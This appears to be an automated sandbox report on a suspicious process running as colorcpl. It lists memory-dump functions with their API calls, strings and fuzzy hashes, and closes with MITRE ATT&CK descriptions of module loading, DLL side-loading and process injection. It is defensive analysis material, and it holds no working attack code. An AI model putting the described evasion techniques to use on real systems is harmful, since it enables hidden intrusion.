API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: be0f08385962161ea85648c4957dacd031c1655b89dff80e0fc428d25076a067
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 5901AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97244C630E851CBA4

Function 032991B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0328F050,?,?,00000000), ref: 032991EC

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction ID: 319f079326d1bc3882b592fbc310950c8499ab5855249c47d5ab2d62ec93fa91
Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction Fuzzy Hash: 90E06D373903043AEB20A599AC02FA7B29CDB81B21F15002AFA4DEA2C0D995F84142A4

Function 0329A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0328F1D2,0328F1D2,?,00000000,?,?), ref: 0329A800

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: e4a2c31beef593fe077476846be0674f2c75e179b8ebfe065b3b8c22ad02a675
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 77E01AB52003086BDB10DF49CC84EE737ADEF88650F118155BA085B241C931E8108BF5

Function 0329A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03294536,?,03294CAF,03294CAF,?,03294536,?,?,?,?,?,00000000,00000000,?), ref: 0329A65D

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 7cc6542c188e21d9659a910a91c4efb5508584d2c35197dfd7c01b37e99a80ba
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: EAE046B6210308ABDB14EF99CC40EA777ACEF88654F118559FE085B241C631F910CBF0

Function 0328F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03288D14,?), ref: 0328F6FB

Memory Dump Source

Source File: 00000007.00000002.3346916231.0000000003280000.00000040.80000000.00040000.00000000.sdmp, Offset: 03280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3280000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: f172013721d8358cf32d8d1a89ed4a7a2e7ffe34b7ba1da5fe8791cced40820b
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 69D05E656603093AEA10FEA59C02F2673889B45A04F4A0064F9489A2C3D990E4014165

Function 05232C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05232C24

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction ID: 47324ab27c78c5555b57896e2e4a6ce7ddfe3e21be942a6908cfc1f513792a09
Opcode Fuzzy Hash: 1da3136e0d1bc11adf47541e3c3089230b59b0a9ea0655ec61c98326b3de72bb
Instruction Fuzzy Hash: 3EB09B739115D5C5DB15F7604609B1779117FD0701F56C461D3070642F4778D1D1E575

Non-executed Functions

Function 008F1975 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008F19A2
GetCurrentProcessId.KERNEL32 ref: 008F19B1
GetCurrentThreadId.KERNEL32 ref: 008F19BA
GetTickCount.KERNEL32 ref: 008F19C3
QueryPerformanceCounter.KERNEL32(?), ref: 008F19D8

Memory Dump Source

Source File: 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3346631053.00000000008F3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_colorcpl.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 755b8c41888ddb81abbfe12d58932b59423f39f067f539b2b0760fcad848c2e3
Instruction ID: 0b6b7d0a575ddaea3ef7567b661ebe01e39d495e00ed28efb86ccb4983c0ac10
Opcode Fuzzy Hash: 755b8c41888ddb81abbfe12d58932b59423f39f067f539b2b0760fcad848c2e3
Instruction Fuzzy Hash: 4C11FE75E11608EBDF14DBB8D948AAEBBF4FF98311F514856D501E7214EB309B00DB54

Function 008F1AC3 Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,008F1BF9,008F1000), ref: 008F1ACA
UnhandledExceptionFilter.KERNEL32(008F1BF9,?,008F1BF9,008F1000), ref: 008F1AD3
GetCurrentProcess.KERNEL32(C0000409,?,008F1BF9,008F1000), ref: 008F1ADE
TerminateProcess.KERNEL32(00000000,?,008F1BF9,008F1000), ref: 008F1AE5

Memory Dump Source

Source File: 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3346631053.00000000008F3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_colorcpl.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 59a3b37698afc56d5434d4e29410d7762dcb003c2a9fafef395f08f9cd5acb44
Instruction ID: db90a5c5aedd642234529f38722ed7f5ac04270c241a7cf93149a9a1c45427f5
Opcode Fuzzy Hash: 59a3b37698afc56d5434d4e29410d7762dcb003c2a9fafef395f08f9cd5acb44
Instruction Fuzzy Hash: 28D012B2000A08BBCB002BF2EE0CE697F28FBC8352F040002F30E82020CF319A01CB69

Function 05232890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0523293C
___swprintf_l.LIBCMT ref: 0523295E
___swprintf_l.LIBCMT ref: 052329A3
___swprintf_l.LIBCMT ref: 0526A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0526A527
ffff:, xrefs: 0526A504
::ffff:0:%u.%u.%u.%u, xrefs: 0526A54E
:%u.%u.%u.%u, xrefs: 0526A5B8

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 898492acaf74ea289a4b1abf374ae8ce343aa8fa6b5fcf45f2a67521d94f0700
Instruction ID: 55e7c002fa58ce6702778abfdb8f66d052e820b40cdc1f432d31f099f6deb168
Opcode Fuzzy Hash: 898492acaf74ea289a4b1abf374ae8ce343aa8fa6b5fcf45f2a67521d94f0700
Instruction Fuzzy Hash: FE51D7B5E24156FFCB20DF9888D197EF7B9BF08200B548169E569D7641E374EE408BA0

Function 052A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A24A6
___swprintf_l.LIBCMT ref: 052A24E2
___swprintf_l.LIBCMT ref: 052A257D
___swprintf_l.LIBCMT ref: 052A25A3
___swprintf_l.LIBCMT ref: 052A25C8
___swprintf_l.LIBCMT ref: 052A2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 052A24DA
::%hs%u.%u.%u.%u, xrefs: 052A249E
:%u.%u.%u.%u, xrefs: 052A25FF
ffff:, xrefs: 052A247D, 052A249D

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1726362b60b7816840ea05c8f4a0401350845398795de48fc03e25dfb4219b64
Instruction ID: 69c6e08de18c725c02efef432268447bf0a88a4a7f05f9db4dca87338ef8d24a
Opcode Fuzzy Hash: 1726362b60b7816840ea05c8f4a0401350845398795de48fc03e25dfb4219b64
Instruction Fuzzy Hash: B851397AA14656EFCB34DF6CC89087FB7FAFF44300B048859E59AD7641D6B4EA408B60

Function 05227630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05264725
CLIENT(ntdll): Processing section info %ws..., xrefs: 05264787
Execute=1, xrefs: 05264713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05264742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052646FC
ExecuteOptions, xrefs: 052646A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05264655

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction ID: 9618c4151f1b693517502a8edc67407a771e225d5598a2aff000df6421533033
Opcode Fuzzy Hash: faa68f7d9e38168bfb6922f244681b6d4c4f88b7dcd48a44ac8e729dee561031
Instruction Fuzzy Hash: 8651197576822A7ADF11EBA4DC8EFB977A9FF04300F0800A9E509AB190DB709E45CF51

Function 008F1463 Relevance: 10.6, APIs: 7, Instructions: 138sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?,008F1C08,00000058), ref: 008F1478
Sleep.KERNEL32(000003E8), ref: 008F14AD
_amsg_exit.MSVCRT ref: 008F14C2
_initterm.MSVCRT ref: 008F1516
__IsNonwritableInCurrentImage.LIBCMT ref: 008F1542
exit.MSVCRT ref: 008F15C5

Memory Dump Source

Source File: 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000007.00000002.3346631053.00000000008F3000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8f0000_colorcpl.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
String ID:
API String ID: 2849151604-0
Opcode ID: c7184ec20e722d5d3a46d5cedc25123ba1d41b915415c6dba758d5c5fe0955fc
Instruction ID: 60c6923d59cfee8f63522f423110c82e6c8dbf0ab4ace7a765a4ec901b510fbb
Opcode Fuzzy Hash: c7184ec20e722d5d3a46d5cedc25123ba1d41b915415c6dba758d5c5fe0955fc
Instruction Fuzzy Hash: 3C41B475A4071DCBDF249B78984DB7976A5F798B21F20402AEB12D7290EB388940CB65

Function 052C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: e0ef68d2a7eea9ac5625c4e33a67ef1298c075dfe9cad45a7c62da119665249a
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 2B021471628341AFC305CF68C494E6ABBE5FFC8700F148A6DF9899B265DB71E905CB42

Function 0523B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0523B6BF

Strings

+, xrefs: 0523B65A
0, xrefs: 0523B695
0, xrefs: 0523B66F
-, xrefs: 0523B650

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 469be294fc5489e948e640e0ddd14f98a53ec98146946d79ff786e06ff718ae6
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 1D8191F1E2924A9ADF24CF68C8927FEBBB2FF45310F18415AD895A7291C77498418B50

Function 052A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A214F
___swprintf_l.LIBCMT ref: 052A2172

Strings

]:%u, xrefs: 052A2169
%%%u, xrefs: 052A2146
[, xrefs: 052A212B

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 501defaa7806d619b76816420bcca805f8e7941c813db0ca33d5e51cd734372c
Instruction ID: 3316f86d7575169538c149dc6be1bce04f37059a94f25f31022eea5d5db93197
Opcode Fuzzy Hash: 501defaa7806d619b76816420bcca805f8e7941c813db0ca33d5e51cd734372c
Instruction Fuzzy Hash: 1521517BA2011AEBCB10DE69D845ABEBBF9AF44744F040126E915E7201EB30D9018BA1

Function 0521F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052602E7
RTL: Re-Waiting, xrefs: 0526031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052602BD

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction ID: fdde31dfaf44939efce2195f5816c75587237c3f450e9d2f2856991ab68823b4
Opcode Fuzzy Hash: b58013d12c46e5b24eb5af69d2836e09ed3189125987c8ced10bcf8b204d66ed
Instruction Fuzzy Hash: 96E1C2706287429FD725CF28C988B2BB7E1BF94314F140A5DF8A98B2D0D774E885CB56

Function 0522BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 05267BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05267B7F
RTL: Resource at %p, xrefs: 05267B8E

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 5787eed4339ab38eaed64339c16a4c20f900a805926a1e65f84bb0f981e3ad2c
Instruction ID: 94f3ed3ccb00b62ac8f0615a03ef64bf827c0d95068b8da1c6fe2bd6bf2c88a3
Opcode Fuzzy Hash: 5787eed4339ab38eaed64339c16a4c20f900a805926a1e65f84bb0f981e3ad2c
Instruction Fuzzy Hash: 2241E139328702AFC720DE25D840B6AB7E6FF88720F100A1DF95A9B280DB71E445CB91

Function 0522B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0526728C

Strings

RTL: Re-Waiting, xrefs: 052672C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05267294
RTL: Resource at %p, xrefs: 052672A3

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction ID: 925d04a1971d412abb586ccab666152ade8a5cb01be249acf8ccba1f7da54e11
Opcode Fuzzy Hash: d74ec254e9c0afb2fb8579932bb48dcb0f4658400ebbab2d2bf259fa9cc168b2
Instruction Fuzzy Hash: 79411F35724216ABC720DE24CC81F6AB7A6FF84714F140619FC59AB280DB31F882CBD0

Function 052A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 052A238D
___swprintf_l.LIBCMT ref: 052A23B3

Strings

%%%u, xrefs: 052A2384
]:%u, xrefs: 052A23AA

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ec1643175bf3731e2a6a91e86b0d17f251987605e880ba9a68214ba427b7c4ce
Instruction ID: da63bfd61b7d37c0b4f2a34617d9d7d11db47fee8b2582ffe223070ea9f88258
Opcode Fuzzy Hash: ec1643175bf3731e2a6a91e86b0d17f251987605e880ba9a68214ba427b7c4ce
Instruction Fuzzy Hash: 04317176A20229DFCB24DE28DC44BAEB7E8FF45710F440556E849E7240EB30AA448FA0

Function 05237D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 05237E8B

Strings

+, xrefs: 05237DE8
-, xrefs: 05237DDD

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 599aafb1a2fbac2749585f3fce9e42e0e0929a2fc6439cc2c59c11fe38e88cac
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 309186F0F2421B9BDF24DF69C882ABEB7A6FF44720F18451AE859E72C0D7709A418750

Function 051F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 051F9191
@, xrefs: 051F9175

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction ID: 9cf45158ebd0ef2ee6cbf46f0c5815b10fa0f71d62e7b725df16112a2721dd2c
Opcode Fuzzy Hash: 0af4341d3c88573680fdd2ab99ffbcd1920e284af808f010c85e19a43242daca
Instruction Fuzzy Hash: E4812B75D14269DBDB35DB54CC49BEEB7B8AF08710F0041EAAA19B7280D7709E85CFA0

Function 0527CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0527CFBD

Strings

@4Cw@4Cw, xrefs: 0527CFD5, 0527CFDA, 0527CFF1
@, xrefs: 0527CF0A

Memory Dump Source

Source File: 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051C0000, based on PE: true

Associated: 00000007.00000002.3357917667.00000000052E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.00000000052ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_51c0000_colorcpl.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 265ac64bac1bba3c63168c73feda5f58bbdb3f80bb0360799de87a271e70a367
Instruction ID: 70ccc04c556cf43343478ade4952ce6cc8d36c9ecc6751a18641e8444ab21790
Opcode Fuzzy Hash: 265ac64bac1bba3c63168c73feda5f58bbdb3f80bb0360799de87a271e70a367
Instruction Fuzzy Hash: D241E471A20229DFCB21DFA4D844E6EBBF8FF55B10F00442AE916EB290D770D941CB61

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
